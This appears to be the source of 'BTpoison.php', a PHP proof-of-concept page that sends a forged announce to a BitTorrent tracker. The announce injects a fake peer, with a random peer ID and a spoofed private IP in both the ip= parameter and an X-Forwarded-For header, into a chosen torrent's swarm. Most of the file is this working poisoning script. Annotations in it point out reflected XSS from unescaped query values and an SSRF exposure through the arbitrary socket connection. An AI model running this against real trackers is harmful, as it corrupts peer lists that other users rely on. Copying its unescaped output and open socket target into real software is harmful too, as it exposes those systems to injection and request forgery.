
BTpoison.php

  1. <!--
  2. This script is creating a random peer on a tracker for a specific torrent, based on the announce URL and the torrent's hash.
  3. It is mostly inspired by the C# script from Burningmace : http://packetstormsecurity.org/0911-exploits/torrent-poisoning.txt
  4. Currently, only ONE request is sent to the tracker and only private IPs are used. It is enough for the proof of concept.
  5. Use it wisely, young padawan.
  6. -->
  7. <HTML>
  8. <HEAD>
  9. <TITLE>BTpoison.php</TITLE>
  10. <STYLE TYPE="text/css">
  11. <!--
  12. BODY, TD, TH {
  13.         font-family: Verdana;
  14.         font-size: 11px;
  15.         color: #867C68;
  16. }
  17. A {
  18.         text-decoration: none;
  19. }
  20. A:HOVER {
  21.         color: #FF0000;
  22.         text-decoration: underline;
  23. }
  24. #warning {
  25.     background-color: #CC0000;
  26.         color: #FFFFFF;
  27.     padding: 5px;
  28.     margin: 20px 0px 20px 0px;
  29.     width: 600px;
  30. }
  31. #log {
  32.     background-color: #000000;
  33.         color: #FFFFFF;
  34.     padding: 5px;
  35.     margin: 20px 0px 20px 0px;
  36.     width: 600px;
  37. }
  38. PRE {
  39.         color: yellow;
  40.     white-space: pre-wrap;       /* CSS-3                  */
  41.     white-space: -moz-pre-wrap;  /* Mozilla, since 1999    */
  42.     white-space: -pre-wrap;      /* Opera 4-6              */
  43.     white-space: -o-pre-wrap;    /* Opera 7                */
  44.     word-wrap: break-word;       /* Internet Explorer 5.5+ */
  45. }
  46. -->
  47. </STYLE>
  48. </HEAD>
  49. <BODY TEXT="#867C68" LINK="#800000" ALINK="#800000" VLINK="#800000">
  50.  
  51. <h3>BTpoison.php</h3><h5>version : 0.070</h5>
  52.  
  53. <?php
  54. // Reads an announce URL and an info-hash from the query string, builds one tracker announce request, sends it over a raw TCP socket and prints the whole exchange as HTML.
  55. $run = $_GET['run']; // only referenced by the commented-out condition below
  56. $announceurl = $_GET['announceurl']; // untrusted input: later used as the connection target and echoed into the page
  57. $hash = $_GET['hash']; // untrusted input: never checked for length or for hex characters
  58. // isset() below tests the copies made above, so the block is skipped when either parameter is absent from the query string.
  59. //if (isset($run) && $run == 'Run') {
  60. if (isset($announceurl) && isset($hash)) {
  61. if ($announceurl == '' || $hash == '') { echo "<div id=\"warning\">You MUST feed me with both URL and hash !</div>"; } else {  
  62.  
  63. // ============================ START ============================
  64.  
  65. echo "<div id=\"log\">";
  66.  
  67. // Split the caller-supplied URL into host, port and path; no scheme check or host allow-list is applied before it is used.
  68. $parsedurl = parse_url($announceurl);
  69. $host = $parsedurl[host] ; // NOTE(review): the unquoted keys (host, port, path) are bare constants; PHP 8 raises an Error for them, older versions fall back to the string with a notice or warning
  70. if (isset($parsedurl[port])) { $hostport = $parsedurl[port] ; } else { $hostport = 80 ; }
  71. $hostpath = $parsedurl[path] ; // not used again in this script
  72. $tmphash = str_split($hash, 2); // two-character chunks, i.e. one byte per chunk when $hash is a hex string
  73. $encodedhash = '%'.implode("%", $tmphash); ; // "%xx%xx..." form used for the info_hash query parameter
  74. $clientid = '-UT1800-'.rand(10,99).rand(10000,99999).rand(10000,99999) ; // UT, AZ, TR... (fixed client prefix followed by 12 random digits)
  75. $left = 0 ; // bytes left (0 to seed)
  76. $event = "completed" ; // or started
  77. $port = rand(42000,42999) ;
  78. $nfetch = 5 ; // numwant
  79. $ipaddress = '192.168.'.rand(0,255).'.'.rand(0,255) ; // always inside 192.168.0.0/16
  80. $uagent = "uTorrent/1800(18488)" ;
  81. // NOTE(review): the values printed below come from the query string and are not passed through htmlspecialchars(), so the page reflects caller-controlled markup (reflected XSS).
  82. echo "announce URL : $announceurl<br>" ;
  83. echo "host : $host<br><br>" ;
  84. echo "hash : $hash<br>" ;
  85. echo "encodedhash : $encodedhash<br><br>" ;
  86. echo "random peer id : $clientid<br>" ;
  87. echo "random peer ip : $ipaddress<br><br>" ;
  88. // Announce URL plus query string. Everything in it is self-reported by the client; a tracker that records the TCP source address instead of the ip= value (or an X-Forwarded-For sent by an untrusted client) does not store the address claimed here.
  89. $request = $announceurl.'?info_hash='.$encodedhash.'&peer_id='.$clientid.'&uploaded=0&downloaded=0&left='.$left.'&event='.$event.'&port='.$port.'&numwant='.$nfetch.'&ip='.$ipaddress.'&compact=1' ;
  90.  
  91. echo "BT request : ".$request."<br><br>--------------------<br><br>" ;
  92.  
  93. // Assemble the raw bytes written to the socket. NOTE(review): the request line already ends with \r\n\r\n, so a server sees an empty header block and the lines appended below arrive after it; in tracker logs this likely shows as an HTTP/1.0 request with an absolute URL and no headers.
  94. $envoi = "GET $request HTTP/1.0\r\n\r\n";
  95. $envoi .= "Host: $host\r\n";
  96. $envoi .= "X-Forwarded-For: $ipaddress\r\n";
  97. $envoi .= "User-Agent: $uagent\r\n";
  98. $envoi .= "Content-type: text/html\r\n";
  99. $envoi .= "Connection: Close\r\n\r\n";
  100.  
  101. $longueur = strlen($envoi) ; // byte length of the assembled request, shown for information only
  102. echo "HTTP request : <pre>$envoi</pre>";
  103. echo "request lenth : $longueur<br><br>--------------------<br><br>";
  104.  
  105. // Open a TCP connection to the host and port taken from the caller's URL. NOTE(review): wherever this page is reachable by others, any visitor can make the web server connect to an arbitrary host:port (internal addresses included) and read the reply further down — a server-side request forgery exposure.
  106. $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  107. if($socket < 0){ die('FATAL ERROR: socket_create() : " '.socket_strerror($socket).' "'); } // NOTE(review): socket_create() signals failure with false, which this "< 0" test does not match
  108.     else { echo "creating socket...<br>"; }
  109. if (socket_connect($socket,gethostbyname($host),$hostport) < 0){ die('FATAL ERROR: socket_connect()'); } // NOTE(review): socket_connect() returns a boolean, so "< 0" is never true here either
  110.     else { echo "connecting socket...<br>"; }
  111. if(($int = socket_write($socket, $envoi, strlen($envoi))) === false){ die('FATAL ERROR: socket_write() failed, '.$int.' characters written'); }
  112.     else { echo "sending HTTP request...<br><br>"; }
  113.  
  114. // Read in chunks of up to 3000 bytes until socket_read() returns a falsy value, accumulating the whole reply in memory with no size limit.
  115. $reception = '';
  116. while($buff = socket_read($socket, 3000)){ $reception.=$buff; }
  117. echo 'server says : <pre>'.$reception."</pre>--------------------<br>"; // the remote reply is inserted into the page unescaped
  118.  
  119. socket_close($socket);
  120.  
  121. echo "</div>"; //log
  122.  
  123. // ============================ END ============================
  124.  
  125.     } // else
  126. } // if isset
  127.  
  128. ?>
  129.  
  130. <form method="get" action="btpoison.php" enctype="multipart/form-data">
  131. <fieldset style="width: 600px;">
  132. <legend>torrent data</legend>
  133. <p><label for="announceurl">announce URL : </label><input type="text" name="announceurl" /><small> &raquo; http://tracker.domaine.ext/announce.php</small></p>
  134. <p><label for="hash">hash : </label><input type="text" name="hash" /><small> &raquo; 43c10318709c06f7ef7d6b4d26673378103203a3</small></p>
  135. <p><input type="submit" name="run" value="Run" /></p>
  136.  
  137. </fieldset>
  138. </form>
  139.  
  140. </BODY>
  141. </HTML>